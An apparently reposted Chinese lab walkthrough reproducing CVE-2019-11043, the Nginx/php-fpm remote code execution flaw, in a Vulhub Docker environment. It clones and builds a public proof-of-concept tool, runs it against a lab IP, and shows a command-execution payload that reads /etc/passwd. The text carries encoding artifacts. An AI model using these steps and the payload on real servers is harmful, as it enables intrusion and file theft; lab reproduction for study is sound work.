今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)。
免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)!
再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試!
一、CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)簡(jiǎn)介
CVE-2019-11043漏洞是PHP的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞產(chǎn)生與Nginx利用fastcgi_split_path_info在處理帶有 %0a 的請(qǐng)求時(shí),會(huì)因?yàn)橛龅綋Q行符(%0a)導(dǎo)致PATH_INFO為空,最終可導(dǎo)致任意代碼執(zhí)行。
關(guān)于該漏洞詳細(xì)分析可參考文章:CVE-2019-11043 Nginx配置詳解
該漏洞普遍出現(xiàn)在Nginx+php-fpm環(huán)境中,且PHP版本在7.0-7.3之間。
二、CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)漏洞環(huán)境搭建
為了復(fù)現(xiàn)該漏洞,我們首先需要搭建該漏洞環(huán)境。我們使用Vulhub來(lái)搭建該漏洞環(huán)境。安裝完Vulhub后,我們可以在Vulhub的PHP目錄下,找到該漏洞,如下所示:
進(jìn)入該漏洞目錄后,我們執(zhí)行命令:
docker-compose build
即可構(gòu)建該漏洞,該命令執(zhí)行結(jié)果如下所示:
之后,我們執(zhí)行命令:
docker-compose up -d
即可大概該漏洞的環(huán)境,該命令執(zhí)行結(jié)果如下所示:
打開(kāi)該漏洞環(huán)境后,執(zhí)行命令:
docker-compose config
可以查看該漏洞的docker配置,之后,我們可以使用瀏覽器訪問(wèn),該漏洞頁(yè)面如下所示:
三、CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)漏洞利用工具安裝
為了利用該漏洞,我們使用Github上該漏洞的公開(kāi)POC。首先,我們git克隆該poc的安裝包,執(zhí)行命令:
git clone https://github.com/neex/phuip-fpizdam.git
該命令執(zhí)行結(jié)果如下圖所示:
下載后,可以看到本地出現(xiàn)了phuip-fpizdam的目錄,如下所示:
該目錄內(nèi)文件如下所示:
之后,我們需要編譯該環(huán)境,進(jìn)入該目錄后,執(zhí)行命令:
go env -w GOPROXY=https://goproxy.cn
go get -v && go build
注意,上述過(guò)程需要本地安裝golang語(yǔ)言環(huán)境,相關(guān)過(guò)程可以參考文章:Kali Linux安裝go語(yǔ)言環(huán)境詳解
上述命令執(zhí)行結(jié)果如下所示:
這樣,我們的漏洞利用POC就安裝完成了。
四、CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)
最后,我們就可以復(fù)現(xiàn)CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)了。在該目錄中,執(zhí)行命令:
go run . "http://192.168.136.13:8080/index.php"
執(zhí)行結(jié)果如下所示:
之后,我們就可以在該頁(yè)面中,使用參數(shù)a來(lái)傳遞執(zhí)行的命令了。例如,我們要查看/etc/passwd文件的內(nèi)容,就可以構(gòu)造如下的poyload:文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-740616.html
http://192.168.136.13:8080/?a=cat%20/etc/passwd
執(zhí)行后結(jié)果如下所示:
注意:由于受到php-fpm多個(gè)子進(jìn)程影響,我們需要訪問(wèn)到php-fpm受污染的子進(jìn)程才會(huì)使得上述payload執(zhí)行成功,因此我們有時(shí)需要多訪問(wèn)幾遍,才會(huì)出現(xiàn)相關(guān)結(jié)果。
原創(chuàng)不易,轉(zhuǎn)載請(qǐng)說(shuō)明出處:https://blog.csdn.net/weixin_40228200文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-740616.html
到了這里,關(guān)于CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!